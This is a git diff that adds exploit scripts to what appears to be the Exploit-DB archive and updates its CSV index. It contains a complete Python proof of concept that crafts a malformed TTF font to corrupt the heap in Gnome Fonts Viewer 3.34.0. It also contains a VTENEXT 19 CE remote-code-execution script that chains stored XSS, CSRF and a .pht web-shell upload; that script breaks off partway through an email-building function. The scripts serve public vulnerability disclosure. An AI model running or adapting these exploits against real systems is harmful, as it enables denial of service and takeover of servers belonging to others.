diff --git a/exploits/linux/local/48803.py b/exploits/linux/local/48803.py new file mode 100755 index 000000000..42cf742c6 --- /dev/null +++ b/exploits/linux/local/48803.py @@ -0,0 +1,53 @@ +#!/usr/bin/env python3 +# Exploit Title: Gnome Fonts Viewer 3.34.0 Heap Corruption +# Date: 2020-09-10 +# Exploit Author: Cody Winkler +# Vendor Homepage: gnome.org +# Software Link: https://help.gnome.org/misc/release-notes/3.6/users-font-viewer.html +# Version: 3.34.0 +# Tested On: Ubuntu 20.04.1 LTS +# +# Note: May take a few tries. Too many consecutive runs can freeze OS. +# This will trigger an infinite malloc() loop until gnome-font-viewer process is stopped. + +from os import system + +this_pattern = "BEEF"*21125 # needs to be filled to len ~84500 + +# TTF file header (probably has some junk data in it) taken from MesloLGS +NF Regular.ttf + +ttf_header = ("\x00\x01\x00\x00\x00\x13\x01\x00\x00\x04\x00\x30\x46\x46\x54" +"\x4d\x75\xfe\x73\xdd\x00\x13\xb6\x0c\x00\x00\x00\x1c\x47\x44\x45" +"\x46\x4d\x76\x5d\xda\x00\x13\xb0\xac\x00\x00\x04\xaa\x47\x50\x4f" +"\x53\x44\x76\x4c\x75\x00\x13\xb5\xec\x00\x00\x00\x20\x47\x53\x55" +"\x42\x09\xf6\x0b\xdc\x00\x13\xb5\x58\x00\x00\x00\x92\x4f\x53\x2f" +"\x32\x8d\xbd\x8e\x75\x00\x00\x01\xb8\x00\x00\x00\x60\x50\x66\x45" +"\x64\x5b\xd3\xe9\x6b\x00\x13\xb6\x28\x00\x00\x02\x50\x63\x6d\x61" +"\x70\xbf\x0d\x76\x7c\x00\x00\x34\x30\x00\x00\x0a\x36\x63\x76\x74" +"\x20\x28\xfd\x02\x16\x00\x00\x48\x98\x00\x00\x00\x38\x66\x70\x67" +"\x6d\x31\xfc\xa0\x95\x00\x00\x3e\x68\x00\x00\x09\x96\x67\x61\x73" +"\x70\xff\xff\x00\x10\x00\x13\xb0\xa4\x00\x00\x00\x08\x67\x6c\x79" +"\x66\xd6\x2f\x24\x7c\x00\x00\xac\xf0\x00\x11\xd8\x34\x68\x65\x61" +"\x64\x04\xe3\x81\x66\x00\x00\x01\x3c\x00\x00\x00\x36\x68\x68\x65" +"\x61\x0a\xf4\x01\xa2\x00\x00\x01\x74\x00\x00\x00\x24\x68\x6d\x74" +"\x78\x93\xdf\x7e\x92\x00\x00\x02\x18\x00\x00\x32\x16\x6c\x6f\x63" +"\x61\xe6\x44\x45\x24\x00\x00\x48\xd0\x00\x00\x64\x20\x6d\x61\x78" +"\x70\x1a\xa2\x0b\x9c\x00\x00\x01\x98\x00\x00\x00\x20\x6e\x61\x6d" +"\x65\x62\x13\x17\xa4\x00\x12\x85\x24\x00\x00\x0b\x9d\x70\x6f\x73" +"\x74\xbb\xe8\x29\xcf\x00\x12\x90\xc4\x00\x01\x1f\xdd\x70\x72\x65" +"\x70\xb4\xc5\xc5\x72\x00\x00\x48\x00\x00\x00\x00\x95\x00\x01\x00" +"\x00\x00\x02\x07\x2b\xd0\x81\xfc\x0f\x5f\x0f\x3c\xf5\x02\x9f\x08" +"\x00\x00\x00\x00\x00\xc5\x74\x19\x33\x00\x00\x00\x00\xda\x9d\x14" +"\xf1\xfd\x41\xfc\xfc\x05\xdf\x0a") + +print('[+] Generating crash.ttf with DEADDEAD') + +with open("./crash.ttf", 'w') as f: +f.write(ttf_header) +f.write(this_pattern) +f.close() +print('[+] Done') + +print('[+] Triggering out-of-bounds write in gnome-font-viewer') +system("/usr/bin/gnome-font-viewer ./crash.ttf") \ No newline at end of file diff --git a/exploits/multiple/webapps/48804.py b/exploits/multiple/webapps/48804.py new file mode 100755 index 000000000..9634111e2 --- /dev/null +++ b/exploits/multiple/webapps/48804.py @@ -0,0 +1,141 @@ +#!/usr/bin/python3 + +# Exploit Title: VTENEXT 19 CE - Remote Code Execution +# Google Dork: n/a +# Date: 2020/09/09 +# Exploit Author: Marco Ruela +# Vendor Homepage: https://www.vtenext.com/en/ +# Software Link: Vendor removed vulnerable version from sourceforge.net +# Version: 19 CE +# Tested on: Ubuntu 16.04 +# CVE : N/A + +# 2020/03/07 - Disclosed vulnerabilities to vendor +# 2020/03/10 - Vendor committed to fix +# 2020/09/09 - Public disclosure + +# This script should be easy enough to follow. +# We string together the three vulnerabilities to get RCE. + +# XSS - The "From" field of the VTENEXT Messages module is vulnerable. +# File Upload - File extensions are checked against a $upload_badext in the config file, .pht extensions are allowed and executable by default . +# CSRF - No CSRF protections in place. + +# exploit.js needs to be hosted somewhere, IP's need to be replaced +# check_csrf() should be changed based on your setup +# run_shell() is a "nice to have" + + +# content of exploit.js +""" +function insertImage() { + var xhr = new XMLHttpRequest(); + xhr.open('POST','http://192.168.226.168/vtenext19ce/index.php?module=Myfiles&action=MyfilesAjax&file=UploadFile&folderid=&uniqueid=',true); + xhr.setRequestHeader('Content-type','multipart/form-data; boundary=---------------------------rekt'); + xhr.setRequestHeader('Content-Length', '248'); + xhr.setRequestHeader('Referer', 'http://172.16.233.146/vtenext19ce/index.php'); + xhr.withCredentials = true; + var body = '-----------------------------rekt\nContent-Disposition: form-data; name="file_0"; filename="shell.pht"\nContent-Type: text/text\n\n\n\n-----------------------------rekt--'; + + var aBody = new Uint8Array(body.length); + for (var i = 0; i < aBody.length; i++) + aBody[i] = body.charCodeAt(i); + xhr.send(new Blob([aBody])); +} + +insertImage(); +""" + +import smtplib +import datetime +import requests +import os +import time + +base_url = "http://192.168.226.168/vtenext19ce/" + +print("[*] CVE-2020-10227, CVE-2020-10228, CVE-2020-10229 - POC") + + +def build_url(): + d = datetime.datetime.today() + year = str(d.year) + month = str(d.strftime("%B")) + week = "week" + str(d.isocalendar()[1] - d.replace(day=1).isocalendar()[1]) + tmp = base_url + "storage/home/1/" + year + "/" + month + "/" + week + "/" + return(tmp) + +def build_mail(): + _from = """' + + \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 437755ac1..b26e60195 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -10377,6 +10377,8 @@ id,file,description,date,author,type,platform,port 48794,exploits/windows/local/48794.txt,"ShareMouse 5.0.43 - 'ShareMouse Service' Unquoted Service Path",2020-09-08,alacerda,local,windows, 48795,exploits/windows/local/48795.txt,"Input Director 1.4.3 - 'Input Director' Unquoted Service Path",2020-09-09,"TOUHAMI Kasbaoui",local,windows, 48796,exploits/windows/local/48796.py,"Audio Playback Recorder 3.2.2 - Local Buffer Overflow (SEH)",2020-09-09,"Felipe Winsnes",local,windows, +48803,exploits/linux/local/48803.py,"Gnome Fonts Viewer 3.34.0 - Heap Corruption",2020-09-11,"Cody Winkler",local,linux, +48806,exploits/windows/local/48806.txt,"Internet Explorer 11 - Use-After-Free",2020-09-11,"Simon Zuckerbraun",local,windows, 42887,exploits/linux/local/42887.c,"Linux Kernel 3.10.0-514.21.2.el7.x86_64 / 3.10.0-514.26.1.el7.x86_64 (CentOS 7) - SUID Position Independent Executable 'PIE' Local Privilege Escalation",2017-09-26,"Qualys Corporation",local,linux, 42890,exploits/windows/local/42890.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Image File Execution Bypass",2017-09-28,hyp3rlinx,local,windows, 42918,exploits/windows/local/42918.py,"DiskBoss Enterprise 8.4.16 - 'Import Command' Local Buffer Overflow",2017-09-28,"Touhid M.Shaikh",local,windows, @@ -40627,6 +40629,8 @@ id,file,description,date,author,type,platform,port 48799,exploits/hardware/webapps/48799.py,"Tiandy IPC and NVR 9.12.7 - Credential Disclosure",2020-09-10,zb3,webapps,hardware, 48800,exploits/php/webapps/48800.py,"CuteNews 2.1.2 - Remote Code Execution",2020-09-10,"Musyoka Ian",webapps,php, 48801,exploits/hardware/webapps/48801.sh,"ZTE Router F602W - Captcha Bypass",2020-09-10,"Hritik Vijay",webapps,hardware, +48804,exploits/multiple/webapps/48804.py,"VTENEXT 19 CE - Remote Code Execution",2020-09-11,"Marco Ruela",webapps,multiple, +48805,exploits/multiple/webapps/48805.txt,"Tea LaTex 1.0 - Remote Code Execution (Unauthenticated)",2020-09-11,nepska,webapps,multiple, 42884,exploits/multiple/webapps/42884.py,"Fibaro Home Center 2 - Remote Command Execution / Privilege Escalation",2017-02-22,forsec,webapps,multiple, 42805,exploits/php/webapps/42805.txt,"WordPress Plugin WPAMS - SQL Injection",2017-09-26,"Ihsan Sencan",webapps,php, 42889,exploits/php/webapps/42889.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Private Key Disclosure",2017-09-28,hyp3rlinx,webapps,php,